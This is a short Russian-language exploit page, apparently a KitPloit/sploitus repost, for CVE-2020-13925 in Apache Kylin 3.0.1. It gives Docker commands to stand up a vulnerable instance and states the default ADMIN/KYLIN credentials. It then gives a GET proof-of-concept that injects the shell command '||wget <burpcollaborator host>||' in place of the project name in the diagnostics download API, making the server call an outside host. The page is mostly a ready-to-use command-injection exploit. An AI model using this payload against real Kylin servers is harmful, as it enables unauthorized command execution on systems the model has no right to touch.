## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BIT4WOO-CVE-2020-13925
# CVE-2020-13925
### Развертывание окружения
Следуйте https://github.com/apache/kylin для развертывания окружения с помощью Docker, измените версию на 3.0.1 (уязвимая версия). Можно удалить 【-m 8G \ 】 — он задает выделение памяти.
Затем перейдите по http://host:7070/kylin/login. Имя пользователя и пароль по умолчанию: `ADMIN/KYLIN`.
root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
### Проверка уязвимости PoC
root@kitploit:~
Исходный запрос:
http://host:port/kylin/api/diag/project/learn_kylin/download
PoC-запрос, метод GET:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
Просто замените имя проекта "learn_kylin" на следующий payload:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||